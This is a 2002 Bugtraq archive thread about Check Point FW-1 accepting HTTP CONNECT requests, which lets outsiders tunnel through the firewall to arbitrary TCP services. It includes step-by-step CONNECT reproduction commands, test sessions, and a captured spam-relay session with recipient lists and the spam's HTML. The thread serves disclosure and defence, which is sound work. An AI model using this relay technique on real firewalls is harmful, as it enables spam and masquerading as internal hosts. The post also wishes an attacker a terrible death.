Bugtraq mailing list archives
Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
From: "Dennis Henderson" <hendo () hendohome com>
Date: Tue, 19 Feb 2002 20:32:19 -0600
William, I was only partially able to reproduce your issue and it was only to destinations and services that my firewall would have already allowed anyway. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0 HTTP/1.0 200 220 ESMTP helo firewall 250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you quit 221 2.0.0 mail.xxx.com closing connection Connection closed by foreign host. Any other connection attempt to a IP:port that was not normally allowed by policy was denied. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0 HTTP/1.0 200 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 85 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> FW-1 at xxxexmfwx: Access denied.</BODY> Connection closed by foreign host. While it is a little startling that Checkpoint would allow this kind of connection, I was not able to actually connect to any place that I would not normally be able to connect from the internet. I do not allow http tunneling. We are running the http security server strictly to block the nimda and code red attacks. I am running 4.1 Sp5 Regards Dennis ----- Original Message ----- From: "William D. Colburn (aka Schlake)" <wcolburn () nmt edu> To: <bugtraq () securityfocus com>; "Dan Lunceford" <dan () nmt edu>; "Ryan" <ryan () nmt edu>; <support () aquilagroup com> Cc: "Madeline Navarrette" <mnavarre () ts checkpoint com> Sent: Monday, February 18, 2002 6:09 PM Subject: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
Checkpoint bounced my mail because I'm not a checkpoint customer, so I contacted customer advocacy and resent it to a different address (this message is copied to her as well). I was told that the issue would be propogated to an appropriate person. Please drop the old message and continue to hold this message until Checkpoint responds. I have a few updates to this issue that I have learned since I crafted the original message. I only need to give the "CONNECT" line, and nothing else. After the second newline there is a pause and then the TCP stream is open. I seem to be able to open any port on any machine I want *except* port 80. I was able to telnet in to UNIX login with the firewall appearing as the remote host. The initial machine I use (inside the firewall) does not need to actually exist, I merely have to attempt to connect to an IP address "inside" on port 80. This whole give anyone outside a firewall the ability to masquerade on any TCP service (except WWW) as a machine inside the domain of the firewall. As far as I can tell there are no logs on this, and it is hard to detect on the firewall. I found it by doing a tcpdump of all packets and gradually narrowing down my filters until I was able to "catch" an entire transaction. ----- Forwarded message from "William D. Colburn (aka Schlake)"
<wcolburn () nmt edu> -----
Step one: telnet to a machine behind the checkpoint firewall on port 80 Step two: Type the following:CONNECT mailserver.somecompany.com:25 / HTTP/1.0 User-Agent: eeep Cache-Control: private,no-cache Pragma: no-cacheStep three: wait a moment for your SMTP banner to pop up. I will attach an actual attack I caputured with tcpdump and ethereal. The file is the result of an ethereal "Follow TCP stream". I hate the person who did this to me and I hope they die a terrible death. -- William Colburn, "Sysprog" <wcolburn () nmt edu> Computer Center, New Mexico Institute of Mining and Technology http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=checkpoint From root () netpeep nmt edu Mon Feb 18 16:05:43 2002 Return-Path: <root () netpeep nmt edu> Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10]) by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700 Received: from netpeep.nmt.edu (localhost [127.0.0.1]) by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700 Received: (from root@localhost) by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584 for schlake () nmt edu; Mon, 18 Feb 2002 16:05:43 -0700 Date: Mon, 18 Feb 2002 16:05:43 -0700 From: root <root () netpeep nmt edu> Message-Id: <200202182305.g1IN5h8w020584 () netpeep nmt edu> To: schlake () nmt edu Content-Length: 3580 Lines: 112 CONNECT mail2.freeuk.net:25 / HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Cache-Control: private,no-cache Pragma: no-cache HELO hotmail.com MAIL FROM: <pheros680506 () hotmail com> RCPT TO: <renewinter () freeuk com> RCPT TO: <renewu () freeuk com> RCPT TO: <renfah () freeuk com> RCPT TO: <renfi11160 () freeuk com> RCPT TO: <renfield13 () freeuk com> RCPT TO: <renfield20 () freeuk com> RCPT TO: <renfield94 () freeuk com> RCPT TO: <renfrew () freeuk com> RCPT TO: <renfro33 () freeuk com> RCPT TO: <reng3 () freeuk com> RCPT TO: <renga () freeuk com> RCPT TO: <rengel293 () freeuk com> RCPT TO: <rengel7495 () freeuk com> RCPT TO: <rengelh946 () freeuk com> RCPT TO: <rengers () freeuk com> RCPT TO: <rengised () freeuk com> RCPT TO: <rengl21068 () freeuk com> RCPT TO: <rengl29048 () freeuk com> RCPT TO: <rengl78818 () freeuk com> DATA Reply-To: <pheros680506 () hotmail com> Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff> From: <pheros680506 () hotmail com> To: <renewinter () freeuk com> Cc: <renewu () freeuk com>, <renfah () freeuk com>, <renfi11160 () freeuk com>, <renfield13 () freeuk com>, <renfield20 () freeuk com>, <renfield94 () freeuk com>, <renfrew () freeuk com>, <renfro33 () freeuk com>, <reng3 () freeuk com>, <renga () freeuk com>, <rengel293 () freeuk com>, <rengel7495 () freeuk com>, <rengelh946 () freeuk com>, <rengers () freeuk com>, <rengised () freeuk com>, <rengl21068 () freeuk com>, <rengl29048 () freeuk com>, <rengl78818 () freeuk com> Subject: A new fragrance
(3437AlLf5-384bbsO4815hPeX5-01@27)
MiME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Importance: Normal Hi ! <HTML> <head><title>Pheros attraction</title> </head> <BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF"> <CENTER> <TABLE WIDTH="650"> <TR> <TD COLSPAN="2"> <FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you
this e-mail. I do not intend to
cause you harm, fill up your mailbox or bother you needlessly. I am only
trying to reach those who are not as secure in their financial future as I
was when I first started looking for a way to earn money online. To be
removed, please go to the end of this e-mail. Please forgive me if you
receive this advertisement twice.<BR><BR>
</FONT>
</TD>
</TR>
<TR>
<TD VALIGN="TOP">
<FONT FACE="VERDANA, ARIAL">
Pheros is a lovely fragrance with a touch of human
pheromones, packaged in a exclusive crafted box.
Pheros is a foolproof tool of seduction, the scent and the
pheromones together make a foolproof combination.
No one can resist the wearer of this mysterious fragrance!
Pheros combines high tech science with the well-known
function of the scent of a luxorious perfume. <BR> The price is 19.95
USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A
HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name =Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif"; border="0"></A>
![http://images.paypal.com/images/x-click-but02.gif"](http://images.paypal.com/images/x-click-but02.gif"){kind=link}
<BR> </FONT> </TD> <TD> <IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg"; border="2"> </TD> </TR> <TR> <TD COLSPAN="2"> <BR> <FONT FACE="Verdana, Arial"> To be removed from this mailing list, please reply to this message with
![http://pheros.freehosting.net/images/Mailbilden.jpg"](http://pheros.freehosting.net/images/Mailbilden.jpg"){kind=link}
the subjct "remove".
You will be BLOCKED from all mail from this site and your request will
take effect within 24 hours.
</FONT> </TD> </TR> </TABLE> </CENTER> </BODY> </HTML>
[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz @71]
. QUIT --AqsLC8rIMeq19msA-- ----- End forwarded message ----- -- William Colburn, "Sysprog" <wcolburn () nmt edu> Computer Center, New Mexico Institute of Mining and Technology http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
Current thread:
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] William D. Colburn (aka Schlake) (Feb 19)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Dennis Henderson (Feb 19)
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Steve VanDevender (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Randal L. Schwartz (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Jason Haar (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Ronald F. Guilmette (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)